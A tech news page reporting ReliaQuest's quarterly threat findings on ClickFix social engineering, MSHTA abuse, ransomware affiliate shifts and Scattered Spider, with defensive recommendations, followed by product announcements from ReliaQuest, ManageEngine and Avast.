ReliaQuest report exposes rise of social engineering cyber threats
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base.
ClickFix and social engineering tactics
One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease.
This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."
Lateral movement and initial access trends
Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities.
ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."
Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors.
MSHTA on the rise for defence evasion
MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake.
"ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.
Changes in ransomware operations
The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."
Impact on industry sectors
The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign.
Malware trends and threat actor activity
The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces.
"Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.
Emergence of Scattered Spider
Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."
Recommendations and defensive measures
ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts.
Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed.
The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Techday NZ
2 days ago
- Techday NZ
ReliaQuest launches GreyMatter automation to speed threat response
ReliaQuest has introduced GreyMatter Workflows, a capability designed to accelerate the detection and containment of security threats by automating operational workflows within its GreyMatter platform. GreyMatter Workflows enables customers to create business-specific automated processes using a no-code, drag-and-drop interface. This functionality aims to reduce the manual effort involved in security operations and enhance response speeds across complex threat environments. Workflow automation The new feature is integrated natively with ReliaQuest's AI-driven security operations platform and automates essential tasks across detection, containment, investigation, and response activities within existing technology infrastructures. GreyMatter Workflows extends automation beyond traditional security tools, facilitating direct interaction with other business units and end users. It also offers integration with services such as Microsoft Teams and Slack, enabling more comprehensive threat verification and communication capabilities. Pre-built workflow templates are provided, based on frequent use cases observed among ReliaQuest's enterprise clients, and can be further customised to suit unique organisational requirements. Security teams can develop and deploy automation processes with zero-code design from initial implementation, and have the option to use AI Agents for more tailored adjustments throughout investigative workstreams. According to ReliaQuest, the adoption of GreyMatter Workflows leads to a reduction in operational complexity, diminishes the need for manual intervention, and shortens incident response times. Customers reportedly experience a 64% decrease in Mean Time to Respond (MTTR) and are able to eliminate more than half of manual response tasks. Customer and industry response "The threat landscape is accelerating, but the operational workflows used to detect and contain those threats haven't kept up," said Brian Foster, President of Product and Technical Operations at ReliaQuest. "Security teams need the ability to automate complex workflows quickly, so they can focus more on managing threats and less on managing tools. GreyMatter Workflows gives our customers the ability to build powerful end-to-end automations to unify all phases of security operations, without leaving the platform." Pat O'Keefe, Head of Global Security Operations and Risk Management at Circle K, commented on the significance of rapid threat management, particularly for organisations with substantial and dispersed operational footprints. "Detecting and containing threats quickly has never been more important in cybersecurity, especially for a business like ours that is distributed across hundreds of locations around the world," said Pat O'Keefe. "Being able to extend our automation capabilities further into our business will help us stay proactive in protecting our brand." Bo Olsen, Security Engineering Manager at Eastern Bank, discussed the evolving direction of daily security operations, emphasising automation as a key priority to allocate resources toward more strategic objectives. "As we look to what's next in cybersecurity, we plan to automate as much as possible of the day-to-day security operations processes so we can spend more time on what matters most to our business," said Bo Olsen. "We can't achieve that level of efficiency with traditional SOAR – an expensive add-on that doesn't deliver the outcomes we really need." Platform details The GreyMatter platform utilises ReliaQuest's Universal Translator, detection-at-source, and Agentic AI components to facilitate connectivity and threat management across cloud, multi-cloud, and on-premises environments. The introduction of Workflows supports ReliaQuest's objective of enabling tailored security outcomes for organisations with differing technology architectures and business needs. With over 1,000 customers and 1,200 staff across six global locations, ReliaQuest continues to offer capabilities in security operations that address the responsiveness and efficiency demands faced by enterprises amid dynamic cybersecurity challenges.
Scoop
3 days ago
- Scoop
ManageEngine Launches MSP Central: A Platform Built For Strengthening Modern MSP Infrastructure
Manage clients securely with integrated RMM, PSA, and advanced server monitoring on a multi-tenant, role-based platform Boost technician productivity with AI-driven ticket insights, sentiment detection, and intelligent alert correlation ManageEngine, a division of Zoho Corporation and a leading provider of enterprise IT management solutions, has announced the launch of MSP Central—a unified platform designed to help MSPs streamline service delivery, device management, threat protection, and infrastructure monitoring from a single interface. ManageEngine focuses on addressing specific operational models and business challenges of MSPs, developing tools that support multi-client environments, technician efficiency, and service scalability. MSP Central brings together these capabilities into a unified platform tailored to how MSPs deliver and manage IT services today. Meeting the Evolving Needs of MSPs With the global managed services market projected to reach $511 billion by 2029, MSPs are facing mounting pressure to scale operations without compromising service quality so as to offer a strategic value to customers and differentiate from the competition. MSP Central directly addresses this fragmentation by offering a unified platform to manage day-to-day operations across clients—from technician workflows and asset visibility to endpoint protection and network health monitoring. Its modular, cloud-native architecture supports native multi-tenancy, fine-grained role-based access control, and seamless integrations with both Zoho apps and third-party tools. This gives MSPs the flexibility to adopt only the modules they need and expand at their own pace. Features Designed to Support MSP Operations 'With MSP Central, we're bringing together the best of ManageEngine's proven IT management and security capabilities in a platform designed from the ground up for MSPs,' said Mathivanan Venkatachalam, vice president at ManageEngine. 'While each of these modules stands strong on its own, together they form a truly unified platform—delivering a single, connected experience for service providers. This approach lets MSPs consolidate their operations, eliminate tool sprawl, and enable their teams to work more efficiently and effectively—all from a unified console." The platform includes the following capabilities: Modular architecture: Adopt only the components required—no bundling or mandatory licensing. Remote monitoring and management (RMM): Manage devices across clients with patching, asset visibility, and proactive remediation in a multi-tenant setup. Professional services automation (PSA): Integrate ticketing, contract management, SLAs, time tracking, and billing in a unified workflow. Advanced server monitoring: Monitor infrastructure across Windows, Linux, databases, and virtual systems with automated alerts and deep metrics. Endpoint security: Provide comprehensive protection against evolving cyberthreats with vulnerability management, device and application control, anti-ransomware, and browser security. AI-powered automation: Accelerate workflows with ticket summarisation, sentiment detection, alert correlation, and predictive thresholds. Third-party integrations: Connect seamlessly with over 20 tools across IT, security and business ecosystems via open APIs and pre-built connectors. Marketplace ready: Built for integration into cloud marketplaces and partner ecosystems. Looking Ahead MSP Central marks the foundation of ManageEngine's long-term MSP platform strategy, which supports the full spectrum of managed services. Future enhancements will focus on expanding into adjacent domains like SIEM, privileged access management, and advanced analytics, helping MSPs and MSSPs manage security and compliance alongside operations. The platform will also evolve to support deeper integrations with business applications and partner ecosystems, empowering providers to streamline service delivery end to end. 'Our goal is to give MSPs a platform that adapts to their growth, supports their preferred tools, and eliminates the friction of fragmented systems. We're starting with RMM, PSA, and advanced server monitoring, but this is just the beginning. Our vision is to bring all of ManageEngine's standalone MSP tools together under this platform, delivering depth, flexibility, and scalability that helps providers grow alongside their clients' needs. MSP Central is designed to support MSPs for the long haul,' added Venkatachalam. Pricing and Availability MSP Central is available globally starting today. The platform supports flexible modular pricing so MSPs can pay for only what they need.
Techday NZ
3 days ago
- Techday NZ
Avast launches free AI scam protection in antivirus for NZ users
Avast has integrated its AI-powered scam protection features into its range of cyber safety products, including free access for customers in New Zealand via Avast Free Antivirus. The new offering, known as Avast Scam Guardian, is now available to users worldwide at no additional charge. There is also a premium tier, Avast Scam Guardian Pro, which enhances protection against email scams and is included in Avast Premium Security. Scam landscape Recent data highlight the scale and sophistication of the threat. According to the Q1/2025 Gen Threat Report, the number of breached personal records rose by more than 186% between January and March 2025. This data includes sensitive information such as passwords, email addresses, and credit card details. In the same three-month period, phishing scams increased by 466% compared to the previous quarter, accounting for almost a third of all scam submissions identified by Gen. Avast notes that cybercriminals are using artificial intelligence to develop scams that are more convincing than ever before and harder to detect. The integration of Scam Guardian aims to provide more robust protection at a time when the risk to consumers is growing. "Today's scams aren't crude or obvious – they're tailored, targeted, and AI-enhanced, making it harder than ever to tell the difference between truth and deception," said Leena Elias, Chief Product Officer at Gen. "As scammers take advantage of rising data breaches and leaked personal information, anyone anywhere can become a victim of scams. That's why it's never been more important to make powerful AI-powered scam protection available to everyone, everywhere. We're levelling the playing field with world class scam defense that helps people strengthen their digital and financial safety." Scam Guardian is powered by proprietary AI models trained on scam data from Gen Threat Labs, going beyond the detection of malicious URLs to include analysis of context and language cues. This enables a more nuanced assessment of websites, emails, and other digital content, as well as the ability to identify deceptive or harmful intent in communications. Feature set There are several key features included in Avast Scam Guardian for Avast Free Antivirus users. Avast Assistant operates around the clock to provide AI-driven guidance on suspicious online activity, covering websites, SMS, emails, links, and offers. Users can interact with this assistant to discuss concerns about potential scams and receive clear, practical advice on how to proceed. This service is available on both Windows and Mac platforms. Another component, Web Guard, leverages telemetry from Gen Threat Labs and AI analysis of millions of websites to detect hidden scams within content and code. This offers additional visibility into dangerous URLs. Web Guard covers Windows, Mac, Android, and iOS systems, although content and code scanning is only available on Windows and Mac. The premium Avast Scam Guardian Pro includes all the standard protections and adds Email Guard. This feature uses AI to interpret the context and meaning within email messages, flagging suspicious or safe emails before the user opens them. It works across devices including Windows, Mac, Android, and iOS. However, while Email Guard is included for mobile platforms, they do not feature the Scam Guardian user interface found on desktop versions. Looking ahead Avast said that further AI-powered features would be added to Scam Guardian Pro later in the year, addressing new vectors of attack such as SMS and phone call scams. These forthcoming tools are intended to strengthen protection against the evolving and increasingly sophisticated nature of cyber scams. Both Scam Guardian and Scam Guardian Pro are currently available to download within Avast Free Antivirus and Avast Premium Security products. In New Zealand, Scam Guardian features are included in the free offering without extra cost.
